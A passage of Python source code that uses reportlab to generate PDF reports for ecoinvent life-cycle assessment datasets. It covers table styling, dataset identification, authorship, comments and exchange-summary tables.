1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ]\ntable_header_style = [('SPAN',(0,0),(-1,0)), \n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.black),\n ('BACKGROUND',(0,1),(-1,1), colors.lightgrey), \n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('LEFTPADDING', (0,0), (0,0), 0), \n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.white),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,1), (-1,1), 0),\n ]\ninner_table_style = [('INNERGRID', (0,0), (-1,0), thin_line, colors.black), \n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), \n ('RIGHTPADDING', (0,0), (-1,-1), 0), \n ('BOTTOMPADDING', (0,1), (-1,-1), 0), \n ('BOTTOMPADDING', (0,0), (-1,0), 3), \n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('SPAN',(0,1),(-1,1))\n ]\nlogo_path = os.path.join(utils.db_basepath, 'common files', 'ecoinvent_logo_2015_small-01.jpg')\ntechnologyLevels = {None: 'Undefined', \n '0': 'Undefined', \n '1': 'New', \n '2': 'Modern', \n '3': 'Current', \n '4': 'Old', \n '5': 'Outdated'\n }\nspecialActivityTypes = {\n '0': 'ordinary transforming activity', \n '1': 'market activity', \n '2': 'IO activity', \n '3': 'Residual activity', \n '4': 'production mix', \n '5': 'import activity', \n '6': 'supply mix', \n '7': 'export activity', \n '8': 're-export activity', \n '9': 'correction activity', \n '10': 'market group'\n }\nAccessRestrictedTos = {\n '0': 'Public', \n '1': 'Licensee', \n '2': 'Results', \n '3': 'Restricted', \n None: ''\n }\ncompartments = {'air': ['urban air close to ground', 'indoor', \n 'low population density, long-term', \n 'unspecified', 'non-urban air or from high stacks', \n 'lower stratosphere + upper troposphere'], \n 'soil': ['forestry', 'unspecified', 'agricultural', 'industrial'], \n 'water': ['ground-, long-term', 'ground-', 'unspecified', 'ocean', 'surface water'], \n 'natural resource': ['in air', 'land', 'biotic', 'in ground', 'in water'], \n 'direct human uptake': ['unspecified'], \n 'social': ['unspecified'], \n 'economic': ['primary production factor']}\npedigree_re = re.compile('[,;]?\\s?\\(\\w*(,\\w*){3,6}\\),?\\s*[,;]?\\s?')\namount_width = 1.2*inch\nsubcompartment_width = 1.3*inch\nprod_vol_width = 1.2*inch\ncontrib_width = .7*inch\nconfidential = Paragraph('This dataset contains some confidential information. All details of the unit process data are therefore not available. Confidential datasets are rarely included in the ecoinvent database and are the result of special circumstances. However, information on products, the dataset documentation and the impact assessment results are available via the ecoinvent website. For more information on confidential datasets, please see the FAQ page on this topic.' % ecoinvent_red, large_table_style)\nclass MyDocTemplate(BaseDocTemplate):\n def __init__(self, filename, **kw):\n self.allowSplitting = 0\n BaseDocTemplate.__init__(self, filename, **kw)\n template1 = PageTemplate('normal', [Frame(MARGIN, MARGIN, PAGE_WIDTH-MARGIN*2., \n PAGE_HEIGHT-MARGIN*3., showBoundary = False)])\n template2 = PageTemplate('normal', [Frame(MARGIN, MARGIN, PAGE_WIDTH-MARGIN*2., \n PAGE_HEIGHT-MARGIN*3., showBoundary = False)]) #, id='F1'\n self.addPageTemplates(template1)\n self.addPageTemplates(template2)\ndef text_corrections(s):\n if len(s) > 0:\n if s[0] == '[' and s[-1] == ']':\n s = s[1:-1]\n s = s.strip()\n if len(s) > 0:\n for previous, new in [('( ', '('), ('.).', '.)'), (' %', '%'), \n ('\\'', '\"'), ('-\\\\t', '- '), ('..', '.'), ('overtaken', 'taken'), (' :', ':'), \n ('\\n', ''), ('\"\"', '\"'), ('. . ', '. '), (').)', ')'), ('version two', 'version 2'), \n ('. .', '.'), ('IEA 212', 'IEA 2012'), ('of the of', 'of the'), \n (' )', ')'), (' )', ')'), ('; .', '; '), \n ('NEED TO BE RELINKED ONCE CEMENT PRODUCTION IS IMPLEMENTED IN ECOINVENT V.3', '')]:\n s = s.replace(previous, new)\n if '\"text\", \"' == s[:9]:\n s = s.replace('\"text\", \"', '')\n if s[-2:] == '\".':\n s = s[:-2]\n if s[:5] == 'none ':\n s = s[5:]\n for previous, new in [('i. e', 'i.e'), ('n. a', 'n.a'), ('. ;', '.;')]:\n s = s.replace(previous, new)\n s = s[0].capitalize() + s[1:]\n if 'ecoinvent version 3 change report' in s:\n to_remove = 'ecoinvent version 3 change report (http://www.ecoinvent.org/database/ecoinvent-version-3/reports-of-changes/)'\n to_add = 'ecoinvent version 3 change report' % ecoinvent_red\n s = s.replace(to_remove, to_add)\n if s[-1] not in ['.', ';', ':']:\n s += '.'\n return s\ndef compartment_header(compartment):\n if compartment in ['natural resource', 'natural resources']:\n tag = 'Inputs from environment'\n else:\n tag = 'Emissions to %s' % compartment\n return tag\ndef product_classifications(ao, sel):\n sel = ao[ao['Product'] == sel['name']].iloc[0]\n if sel['mft'] == 'not mft':\n mft = 'no'\n else:\n mft = 'yes'\n bpc = sel['By-product classification']\n return mft, bpc\ndef find_exc(s, f):\n if 'Environment' in s['group']:\n exc = f.find_exchanges({'name': s['name'], \n 'compartment': s['compartment'], \n 'subcompartment': s['subcompartment']})[0]\n elif s['group'] == 'FromEnvironment':\n exc = f.find_exchanges({'group': s['group'], \n 'name': s['name']})[0]\n else:\n to_search = {'group': s['group'], 'name': s['name'], \n 'activityLinkId': s['activityLinkId']}\n if str(to_search['activityLinkId']) in ['None', 'nan', 'NaN', 'NAN', '']:\n to_search['activityLinkId'] = None\n exc = f.find_exchanges(to_search)[0]\n return exc\ndef find_activityLink(exc):\n sel = ao.loc[exc.activityLinkId]\n if type(sel) != pandas.core.series.Series:\n sel = sel.iloc[0]\n return sel['activityName'], sel['geography']\ndef arrange_comments(f, s, ao, logs, AL = True):\n to_write = []\n length_to_write = 0\n exc = find_exc(s, f)\n comments = []\n for c in exc.comment: #eliminate duplicate comments\n for cc in c.split('\\n'):\n if cc not in comments and len(cc) > 1:\n comments.append(cc)\n exc.comment = deepcopy(comments)\n if f.specialActivityType == '1' and s['unitName'] == 'metric ton*km':\n ref_exc = f.get_reference_product()\n if 'wet mass' in ref_exc.properties_dict:\n wm = ref_exc.properties_dict['wet mass'][0]\n if wm != 0.:\n km = s['amount']/wm*1000.\n p = 'This corresponds to the transport of %s %s of the reference product for %s km.' % (\n abs(ref_exc.amount), ref_exc.unitName, utils.arrange_float(km, switch_sci = 6))\n length_to_write += len(p)\n to_write.append(Paragraph(p, header_style))\n if exc.activityLinkId != None and AL:\n if exc.activityLinkId in ao.index:\n name, geo = find_activityLink(exc)\n p = 'Activity link: %s - %s' % (name, geo)\n else:\n p = 'Activity link: Info not yet in masterdata'\n to_write.append(Paragraph(p, header_style))\n length_to_write += len(p)\n comment = []\n if exc.comment != None:\n for i in range(len(exc.comment)):\n if exc.comment[i][-3:] == 'nan':\n exc.comment[i] = exc.comment[i][:-3]\n exc.comment[i] = exc.comment[i].strip()\n if len(exc.comment[i]) > 0:\n if exc.comment[i][-1] not in ['.', ';', ':']:\n exc.comment[i] += '.'\n comment.append(exc.comment[i])\n comment = ' '.join(comment)\n if len(comment) != 0:\n to_write.append(Paragraph('Comment: ' + utils.killgremlins(comment), header_style))\n length_to_write += len('Comment: ' + comment)\n if hasattr(exc, 'productionVolumeComment') and not utils.is_empty(exc.productionVolumeComment):\n to_write.append(Paragraph('Production volume comment: ' + exc.productionVolumeComment, header_style))\n length_to_write += len('Production volume comment: ' + exc.productionVolumeComment)\n if exc.group != 'ReferenceProduct' and not utils.is_empty(exc.uncertainty):\n text = 'Uncertainty distribution: ' + exc.uncertainty.type\n if exc.uncertainty.type == 'lognormal':\n text += '; GSD2: %s; Pedigree matrix: %s' % (\n utils.arrange_float(np.exp(np.sqrt(exc.uncertainty.varianceWithPedigreeUncertainty)), \n significative_digits = 3, switch_sci = 6), \n exc.uncertainty.pedigreeMatrix)\n to_write.append(Paragraph(text, header_style))\n if not utils.is_empty(exc.uncertainty.get('comment')):\n for i in range(len(exc.uncertainty.get('comment'))):\n if exc.uncertainty.comment[i][-3:] == 'nan':\n exc.uncertainty.comment[i] = exc.uncertainty.get('comment')[i][:-3]\n exc.uncertainty.comment[i] = exc.uncertainty.get('comment')[i].strip()\n for comment in exc.uncertainty.get('comment'):\n to_write.append(Paragraph('Uncertainty comment: ' + comment, small_table_style))\n length_to_write += len('Uncertainty comment: ' + comment)\n if exc.sourceFirstAuthor != None:\n p = 'Source: ' + exc.sourceFirstAuthor\n if exc.sourceYear != None:\n p += ' ' + exc.sourceYear\n length_to_write += len('Source: ' + p)\n to_write.append(Paragraph(p, header_style))\n ref = f.get_reference_product()\n if (f.specialActivityType in [1, 10] and \n f.get('modellingAndValidation').get('systemModelName') != 'Undefined' and \n ref.name == exc.name and \n exc.activityLinkId != f.id and\n exc.group == 'FromTechnosphere'):\n sel = ao.loc[exc.activityLinkId]\n if type(sel) != pandas.core.frame.DataFrame:\n sel = DataFrame(sel).transpose()\n try:\n sel = sel[sel['name'] == exc.name]\n except:\n 1/0\n if len(sel) > 0:\n sel = sel.iloc[0]\n p = 'Annual production volume of supplying activity: %s %s' % (\n utils.arrange_float(sel['productionVolumeAmount'], switch_sci = 4), \n exc.unitName)\n if not utils.is_empty(sel['productionVolumeAmount']):\n p += '; ' + str(sel['productionVolumeAmount'])\n to_write.append(Paragraph(p, header_style))\n if length_to_write > max_comment_length:\n to_write = [Paragraph('The comment entered by the data provider is too long to be displayed. Please refer to ecoQuery or ecoEditor for more details.', header_style)]\n if len(to_write) == 0:\n to_write.append(Paragraph('Comment: None.', header_style))\n return to_write, logs, length_to_write\ndef get_relative_contributions(f, s, A):\n cut_off = .1 #in percent\n total_scores = find_total_score(f)\n exc = find_exc(s, f)\n if exc.activityLinkId == None and 'Environment' not in exc.group:\n rel_contrib = ['0']*len(total_scores)\n else:\n rel_contrib = []\n if 'Environment' in exc.group:\n ee_name = (exc.name, exc.compartment, exc.subcompartment)\n if ee_name in indexes.ee:\n for i in range(len(total_scores)):\n CF = C[indexes.toggle['LCIA'][indicators_for_contrib[i]],indexes.toggle['ee'][ee_name]]\n r = exc.amount * CF / total_scores[i]*100\n if total_scores[i] == 0.:\n r = '0'\n elif abs(r) < cut_off:\n r = '<' + str(cut_off).replace('.0', '')\n elif r > 100.-cut_off:\n r = '100%'\n else:\n r = utils.arrange_float(r, significative_digits = 2, switch_sci = 6)\n if r[-2:] == '.0':\n r = r[:-2]\n rel_contrib.append(r)\n else:\n name, geo = find_activityLink(exc)\n ie = (name, geo, exc.name)\n if ie in indexes.ie:\n scores = utils.pkl_load(scores_path, str(indexes.toggle['ie'][ie]))\n for i in range(len(total_scores)):\n LCIA = indicators_for_contrib[i]\n try:\n s = scores[indexes.toggle['LCIA'][LCIA],0]\n except IndexError:\n s = scores[0,indexes.toggle['LCIA'][LCIA]]\n x = indexes.toggle['ie'][ie]\n r = s / total_scores[i] * exc.amount*100. * A[x, x]\n if total_scores[i] == 0.:\n r = '0'\n elif abs(r) < cut_off:\n r = '<' + str(cut_off).replace('.0', '')\n elif r > 100.-cut_off:\n r = '100'\n else:\n r = utils.arrange_float(r, significative_digits = 2, switch_sci = 6)\n if r[-2:] == '.0':\n r = r[:-2]\n rel_contrib.append(r)\n return rel_contrib\ndef dataset_id(f, Story, ao, logs, serialization_mapping, system_model):\n if f.id in ao.index:\n ao_f = ao.loc[f.id].iloc[0]\n else:\n ao_f = None\n \n #header\n table_content = [[Paragraph('Dataset identification', title_style), '', \n Paragraph('Table of content', title_style)]]\n \n #activity name\n table_content.append(\n [Paragraph('Activity name', header_style), Paragraph(f.activityName, large_table_style)])\n \n #geography\n longname = MD['Geographies'].loc[f.geography]['name']\n if ' (' in longname:\n longname = 'China - ' + longname.split(' (')[0]# chinese provinces have a character in parenthesis that does not appear well\n g = '%s (%s)' % (f.geography, longname)\n g = g.replace(' (Europe without Switzerland)', '')\n table_content.append([Paragraph('geography', header_style), \n Paragraph(g, large_table_style)])\n \n #time period\n to_write = f.get('startDate') + ' to ' + f.get('endDate') + '
'\n if hasattr(f, 'isDataValidForEntirePeriod'):\n if f.isDataValidForEntirePeriod == 'true':\n to_write += 'Valid for the entire period'\n else:\n to_write += 'Not valid for all period'\n table_content.append([Paragraph('Time period', header_style), Paragraph(to_write, large_table_style)])\n \n #synonyms\n if not utils.is_empty(f.get('synonym')):\n up_to = 3\n if len(f.synonym) == 1:\n table_content.append([Paragraph('Synonym(s)', header_style), Paragraph(f.synonym[0], large_table_style)])\n else:\n if len(f.synonym) > up_to:\n to_write = {0:{'system model': f.get('modellingAndValidation').get('systemModelName'), \n 'activityName': f.activityName, \n 'geography': f.geography, \n 'filename': f.filename, \n 'problem type': 'too many synonyms', \n 'details': 'only the first %s were written' % up_to}}\n #logs = concat([logs, DataFrame(to_write).transpose()])\n else:\n up_to = len(f.synonym)\n to_write = [Paragraph(f.synonym[0], large_table_style)]\n for i in range(1, up_to):\n to_write.append(Paragraph(f.synonym[i], large_table_style))\n table_content.append([Paragraph('Synonyms', header_style), to_write])\n else:\n table_content.append([Paragraph('Synonym', header_style), Paragraph('None', large_table_style)])\n \n #ISIC classification\n if not utils.is_empty(f.get('classifications')):\n for c in f.classifications:\n if c.classificationSystem == 'ISIC rev.4 ecoinvent':\n c = c.classificationValue.split(':')\n for i in range(len(c)):\n c[i] = c[i].strip()\n c = '%s: %s' % tuple(c)\n table_content.append([Paragraph('ISIC 4 classification', header_style), \n Paragraph(c, large_table_style)])\n break\n else:\n table_content.append([Paragraph('Classification', header_style), ''])\n \n #reference product\n ref = f.get_reference_product()\n table_content.append([Paragraph('Reference product', header_style), \n Paragraph(ref.name, large_table_style)])\n \n #CPC classification\n for c in ref.get('classifications'):\n if c.classificationSystem == 'CPC':\n table_content.append([Paragraph('CPC classification', header_style), \n Paragraph(c.classificationValue, large_table_style)])\n break\n \n #special activity type\n to_write = [Paragraph(spold2.meta_translator['specialActivityType'][f.get('specialActivityType')].capitalize(), large_table_style)]\n if type(ao_f) == pandas.core.series.Series and f.specialActivityType == 'market activity':\n if ao_f['constrained market'] == 'no':\n to_write.append(Paragraph('unconstrained market', large_table_style))\n else:\n to_write.append(Paragraph('constrained market', large_table_style))\n table_content.append([Paragraph('Dataset type', header_style), to_write])\n \n #Technology level\n table_content.append([Paragraph('Technology level', header_style), spold2.meta_translator['technologyLevel'][f.get('technologyLevel')]])\n \n #version\n if '2016-' in version:\n v = '3.3'\n else:\n v = version\n table_content.append([Paragraph('Version - system model', header_style), \n Paragraph('%s - %s' % (v, system_model), large_table_style)])\n \n #Table of content\n for i in range(1, len(table_content)):\n table_content[i].append('')\n table_style = deepcopy(v_header)\n table_style[0] = ('VALIGN', (0, 0), (-2, -1), 'MIDDLE')\n table_style[3] = ('BACKGROUND', (0, 1), (0, -1), colors.lightgrey)\n table_style.append(('SPAN',(0,0),(1,0)))\n table_style.append(('SPAN',(2,1),(2,-1)))\n table_style.append(('INNERGRID', (2, 0), (2, -1), 0.25, colors.white))\n table_style.append(('VALIGN', (-1, 0), (-1, -1), 'TOP'))\n inner_table = [[table_of_content(f)]]\n \n #Note\n if f.get('modellingAndValidation').get('systemModelName') == 'Undefined':\n p = Paragraph('Notes: This document contains only an extract of the information in the dataset. Additional data about properties of exchanges, mathematical relations, parameters, and contact information for authors and reviewers are available in the full dataset, e.g. through the ecoinvent website. \\nAmount and identity of the exchanges in an undefined dataset are independant of modeling choices in by the different system models. Linked dataset are available in separate documents. ', small_justified)\n else:\n p = Paragraph('Note: This document contains only an extract of the information in the dataset. Additional data about properties of exchanges, mathematical relations, parameters, and contact information for authors and reviewers are available in the full dataset, e.g. through the ecoinvent website. ', small_justified)\n inner_table.append([p])\n \n #Link to ecoQuery\n if type(serialization_mapping) == str:\n link = ''\n else:\n link = link_to_ecoQuery(serialization_mapping, f, system_model)\n inner_table.append([Paragraph('Link to the dataset on the ecoinvent website' % (\n link, ecoinvent_red), header_style)])\n table_content[1][2] = Table(inner_table)\n t = Table(table_content, colWidths = [1.2*inch, 3.2*inch, 2.8*inch])\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n Story.append(Spacer(1, inter_par_dist))\n return Story, logs\ndef table_of_content(f):\n table_content = []\n table_content.append([Paragraph('Exchange summary' % ecoinvent_red, large_table_style)])\n table_content.append([Paragraph('Dataset description' % ecoinvent_red, large_table_style)])\n try:\n if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n table_content.append([Paragraph('Detailed information for exchanges' % ecoinvent_red, large_table_style)])\n except:\n pass\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n table_content.append([Paragraph('Selected impact assessment results' % ecoinvent_red, large_table_style)])\n table_content.append([Paragraph('Sources' % ecoinvent_red, large_table_style)])\n table_style = [('LEFTPADDING', (0,0), (-1,-1), 0)]\n t = Table(table_content)\n t.setStyle(TableStyle(table_style))\n return t\ndef dataset_authorship(f, Story, MD):\n to_remove = [', NOENTRY']\n colWidths = [1.1*inch, .9*inch, 5.*inch]\n header = [['']*len(colWidths)]\n header[0][0] = Paragraph('Dataset authorship', title_style)\n header.append([Paragraph('Role', large_table_style), Paragraph('Date', large_table_style), \n Paragraph('Name, organisation', large_table_style)])\n header = Table(header, colWidths = colWidths)\n header.setStyle(TableStyle(table_header_style))\n table_content = [['']*len(colWidths)]\n table_content[0][0] = header\n try:\n name = f.personName\n except AttributeError:\n name = '[System]'\n if hasattr(f, 'personId') and f.personId in set(MD['persons'].index):\n sel = MD['persons'].loc[f.personId]\n if type(sel['companyId']) == str:\n name += ', ' + MD['Companies'].loc[sel['companyId']]['name']\n for t in to_remove:\n name = name.replace(t, '')\n name = [Paragraph(name, large_table_style)]\n if hasattr(f, 'isActiveAuthor') and f.isActiveAuthor == 'true':\n name.append(Paragraph('active author', large_table_style))\n table_content.append([Paragraph('Data generator', large_table_style), \n f.creationTimestamp.split('T')[0], name])\n name = f.dataGeneratorAndPublication.personName\n else:\n #new name not yet in the master data\n name = '[System]'\n if name != '[System]':\n try:\n sel = MD['persons'].loc[f.dataGeneratorAndPublication.personId]\n except:\n if type(sel['companyId']) == str:\n company = MD['Companies'].loc[sel['companyId']]['name']\n if company != 'NOENTRY':\n name += ', ' + company\n for t in to_remove:\n name = name.replace(t, '')\n table_content.append([Paragraph('Data entry', large_table_style), f.creationTimestamp.split('T')[0], \n Paragraph(name, large_table_style)])\n reviews = []\n for r in f.get('modellingAndValidation').get('reviews'):\n if not utils.is_empty(r.reviewDate):\n name = r.reviewerName\n if name != '[System]':\n sel = MD['Persons'].loc[r.get('reviewerId')]\n if type(sel['companyId']) == str:\n name += ', ' + MD['Companies'].loc[sel['companyId']]['name']\n for t in to_remove:\n name = name.replace(t, '')\n to_add = {'name': name, \n 'date': r.reviewDate, \n 'contact': sel['email']}\n reviews.append(to_add)\n if len(reviews) != 0:\n reviews = utils.list_to_df(reviews)\n reviews = reviews.sort('date').drop_duplicates('name', take_last = True)\n max_reviews = 3\n if len(reviews) > max_reviews:\n reviews = reviews.iloc[-max_reviews:]\n for i in range(len(reviews)):\n table_content.append([Paragraph('Review', large_table_style), \n Paragraph(reviews.iloc[i]['date'], large_table_style), \n Paragraph(reviews.iloc[i]['name'], large_table_style)])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(h_header2))\n Story.append(t)\n Story.append(Spacer(1, inter_par_dist))\n return Story\ndef TTextAndImage_print(f, Story, tag, field, logs, market_comments, \n image_counter, image_report):\n write = False\n if field == 'generalComment':\n write = True\n elif f.get(field) != None and len(f.get(field).comments) != 0:\n write = True\n if write:\n Story.append(Paragraph('%s' % tag, justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n something = False\n if field == 'generalComment' and f.specialActivityType in ['1']:\n sel = market_comments.loc[(f.specialActivityType, field), 'text']\n for c in sel.split('\\n'):\n Story.append(Paragraph(c, no_info_style))\n Story.append(Spacer(1, small_spacer))\n something = True\n if f.get(field) != None and len(f.get(field).comments) != 0:\n for comment_type, comment, comment_index in getattr(f, field).comments:\n something = True\n if comment_type == 'text':\n if comment not in [None, '']:\n if 'http' not in comment:\n comment = comment.split('//')\n else:\n comment = [comment]\n for c in comment:\n if len(c) > 0:\n c = text_corrections(c)\n if 'individually updated during' in c:\n link = 'http://www.ecoinvent.org/support/documents-and-files/documents-and-files.html#290'\n c += ' The original ecoinvent version 2 documentation can be consulted here. ' % (\n link, ecoinvent_red)\n Story.append(Paragraph(c, bullet))\n Story.append(Spacer(1, small_spacer))\n else:\n try:\n if f.activityName != 'lightweight concrete block production, expanded clay':\n I = Image(comment)\n aspect = I.imageHeight / float(I.imageWidth)\n width = min((PAGE_WIDTH-2.*MARGIN)*.8, I.imageWidth)\n I = Image(comment, width=width, height=width * aspect)\n I.hAlign = 'CENTER'\n t = Table([[I]], colWidths = [7.*inch])\n t.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTRE'),]))\n Story.append(t)\n image_counter +=1\n to_add = {'activityName': f.activityName, \n 'geography': f.geography, \n 'filename': f.filename, \n 'reference product': f.get_reference_product().name, \n 'image url': comment}\n image_report[len(image_report)] = copy(to_add)\n except IOError:\n to_write = {0:{'system model': f.get('modellingAndValidation').get('systemModelName'), \n 'activityName': f.activityName, \n 'geography': f.geography, \n 'filename': f.filename, \n 'problem type': 'image unavailable', \n 'details': comment}}\n logs = concat([logs, DataFrame(to_write).transpose()])\n if not something:\n Story.append(no_info)\n if Story[-1] != Spacer(1, small_spacer):\n Story.append(Spacer(1, small_spacer))\n return Story, logs, image_counter, image_report\ndef text_comments(f, Story, market_comments):\n Story.append(Paragraph('Included activities start', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n something = False\n if f.specialActivityType in [1, 10]:\n sel = market_comments.loc[(f.specialActivityType, \n 'includedActivitiesStart'), 'text']\n for c in sel.split('\\n'):\n Story.append(Paragraph(c, no_info_style))\n something = True\n if f.get('includedActivitiesStart') != None:\n comment = text_corrections(f.includedActivitiesStart)\n Story.append(Paragraph(comment.split('- ')[0], bullet))\n something = True\n for c in comment.split('- ')[1:]:\n c = c.strip()\n c = ' - ' + c\n if len(c) > 1:\n if c[-1] not in ['.', ';', ':']:\n c += '.'\n Story.append(Paragraph(c, bullet))\n if not something:\n Story.append(no_info)\n Story.append(Spacer(1, small_spacer))\n Story.append(Paragraph('Included activities ends', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n something = False\n if f.specialActivityType in ['1']: #no such comment for market groups\n sel = market_comments.loc[(f.specialActivityType, \n 'includedActivitiesEnd'), 'text']\n for c in sel.split('\\n'):\n Story.append(Paragraph(c, no_info_style))\n something = True\n if f.get('includedActivitiesEnd') != None:\n comment = text_corrections(f.includedActivitiesEnd)\n Story.append(Paragraph(comment.split('- ')[0], bullet))\n something = True\n for c in comment.split('- ')[1:]:\n c = text_corrections(c)\n c = ' - ' + c\n if len(c) > 1:\n Story.append(Paragraph(c, bullet))\n if not something:\n Story.append(no_info)\n Story.append(Spacer(1, small_spacer))\n if not utils.is_empty(f.get('modellingAndValidation').get('samplingProcedure')):\n Story.append(Paragraph('Sampling procedure', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n comment = text_corrections(f.get('modellingAndValidation').get('samplingProcedure'))\n Story.append(Paragraph(comment, bullet))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n if not utils.is_empty(f.get('modellingAndValidation').get('extrapolations')):\n Story.append(Paragraph('Extrapolations', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n comment = text_corrections(f.get('modellingAndValidation').get('extrapolations'))\n Story.append(Paragraph(comment, bullet))\n Story.append(Spacer(1, small_spacer))\n return Story\ndef build_exchange_df(f):\n exchange_df = []\n for exc in f.get_all_exchanges():\n to_add = exc.baseline(additional_fields = ['sourceId', 'productionVolumeAmount'])\n to_add['unitName'] = to_add['unitName'].replace('metric ton*km', 'ton*km')\n if exc.get('uncertainty') != None:\n to_add.update({'distribution': exc.uncertainty.type, \n 'pedigree': exc.uncertainty.pedigreeMatrix})\n else:\n to_add['distribution'] = to_add['pedigree'] = ''\n exchange_df.append(to_add)\n exchange_df = utils.list_to_df(exchange_df)\n classifications = ao[['name', 'By-product classification', 'mft']].reset_index()\n #fix me: classification could come from current MD. Would allow classification of\n #stuff not in the DB yet. \n if 'Activity UUID' in classifications.columns:\n del classifications['Activity UUID']\n classifications = classifications.drop_duplicates(subset = ['name']).set_index('name')\n exchange_df = exchange_df.set_index('name')\n exchange_df = exchange_df.join(classifications)\n exchange_df = exchange_df.reset_index()\n if 'name' not in exchange_df:\n exchange_df = exchange_df.rename(columns = {'index': 'name'})\n exchange_df = exchange_df.sort('name')\n exchange_df.loc[exchange_df['mft'] == 'not mft', 'mft'] = 'no'\n exchange_df.loc[exchange_df['mft'] == 'mft', 'mft'] = 'yes'\n exchange_df = exchange_df.replace(to_replace = {'compartment': {np.NaN: ''}}) \n return exchange_df\ndef exchange_summary_undefined(exchange_df, Story):\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (0,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ]\n groups = ['ReferenceProduct', 'ByProduct']\n if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n groups.append('FromTechnosphere')\n else:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n stars = 1\n footnotes = []\n for group in groups:\n table_style_ = deepcopy(table_style)\n sel = exchange_df[exchange_df['group'] == group]\n if len(sel) > 0:\n if group == 'ReferenceProduct':\n s = 'Reference products'\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity, or a market linking to treatment activities.'))\n stars += 1\n elif group == 'ByProduct':\n s = 'By-products'\n if sel['amount'].min() < 0. and f.specialActivityType == '1':\n s += '*'*stars\n footnotes.append(('*'*stars, 'Negative by-products in a market dataset indicate a constrained market, a feature of the consequential system model. '))\n stars += 1\n elif sel['amount'].min() < 0.:\n 1/0\n else:\n s = 'Inputs from technosphere'\n if group != 'FromTechnosphere':\n colWidths = [3.9*inch, 0.9*inch, 1.*inch, amount_width]\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Material for treatment', large_table_style), \n Paragraph('Byproduct classif.', large_table_style), \n Paragraph('Amount', large_table_style)]]\n else:\n colWidths = [5.8*inch, amount_width]\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n name = f.get_reference_product().name\n name_list = list(set(sel['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel1 = sel[sel['name'] == name]\n amount = sel1['amount'].sum()\n if group != 'FromTechnosphere':\n if utils.is_empty(sel1.iloc[0]['mft']):\n mft = ''\n else:\n mft = sel1.iloc[0]['mft']\n if utils.is_empty(sel1.iloc[0]['mft']):\n bpc = ''\n else:\n bpc = sel1.iloc[0]['By-product classification']\n table_content.append([Paragraph(name, large_table_style),\n Paragraph(mft, large_table_style), \n Paragraph(bpc, large_table_style), \n '%s %s' % (utils.arrange_float(amount), sel1.iloc[0]['unitName'])])\n else:\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel1.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_cutoff(exchange_df, Story):\n sel = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n colWidths = [4.9*inch, 0.9*inch, amount_width]\n table_style = [\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey)]\n s = 'Reference product'\n stars = 1\n footnotes = []\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity, or a market linking to treatment activities.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Byproduct classif.', large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_content.append([Paragraph(sel.iloc[0]['name'], large_table_style),\n Paragraph(sel.iloc[0]['By-product classification'], 